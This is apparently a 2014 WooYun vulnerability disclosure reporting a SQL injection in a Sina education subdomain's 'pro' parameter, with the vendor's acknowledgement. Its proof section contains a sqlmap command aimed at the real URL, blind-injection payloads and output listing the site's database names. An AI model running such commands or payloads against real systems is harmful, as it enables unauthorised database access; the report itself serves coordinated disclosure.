当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-075092

漏洞标题:新浪另一分站某SQL注射

相关厂商:新浪

漏洞作者: Jannock

提交时间:2014-09-05 00:11

修复时间:2014-10-20 00:12

公开时间:2014-10-20 00:12

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-09-05: 细节已通知厂商并且等待厂商处理中
2014-09-05: 厂商已经确认,细节仅向厂商公开
2014-09-15: 细节向核心白帽子及相关领域专家公开
2014-09-25: 细节向普通白帽子公开
2014-10-05: 细节向实习白帽子公开
2014-10-20: 细节向公众公开

简要描述:

新浪另一分站某SQL注射。。。

详细说明:

http://ischool.edu.sina.com.cn/app_school/interface/getproOrder?pro=1
pro 参数

漏洞证明:

root@bt:/pentest/database/sqlmap# python sqlmap.py -u "http://ischool.edu.sina.com.cn/app_school/interface/getproOrder?pro=1" --dbms=mysql --dbs --threads 5
sqlmap/1.0-dev-25eca9d - automatic SQL injection and database takeover tool
http://sqlmap.org
[!] legal disclaimer: usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Authors assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting at 22:48:00
[22:48:00] [INFO] testing connection to the target url
[22:48:01] [INFO] heuristics detected web page charset 'ascii'
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: pro
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: pro=1 AND 7021=7021
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: pro=1 AND SLEEP(5)
---
[22:48:01] [INFO] testing MySQL
[22:48:01] [WARNING] reflective value(s) found and filtering out
[22:48:01] [INFO] confirming MySQL
[22:48:01] [INFO] the back-end DBMS is MySQL
web application technology: Apache
back-end DBMS: MySQL >= 5.0.0
[22:48:01] [INFO] fetching database names
[22:48:01] [INFO] fetching number of databases
[22:48:01] [INFO] retrieved: 3
[22:48:03] [INFO] retrieving the length of query output
[22:48:03] [INFO] retrieved: 18
[22:48:12] [INFO] retrieved: information_schema
[22:48:12] [INFO] retrieving the length of query output
[22:48:12] [INFO] retrieved: 11
[22:48:18] [INFO] retrieved: consultants
[22:48:18] [INFO] retrieving the length of query output
[22:48:18] [INFO] retrieved: 4
[22:48:20] [INFO] retrieved: test
available databases [3]:
[*] consultants
[*] information_schema
[*] test
[22:48:20] [INFO] fetched data logged to text files under '/pentest/database/sqlmap/output/ischool.edu.sina.com.cn'
[*] shutting down at 22:48:20

修复方案:

过滤

版权声明:转载请注明来源 Jannock@乌云


漏洞回应

厂商回应:

危害等级:低

漏洞Rank:1

确认时间:2014-09-05 13:21

厂商回复:

感谢关注新浪安全,此漏洞已经由它白帽子报告,漏洞在修复中。

最新状态:

暂无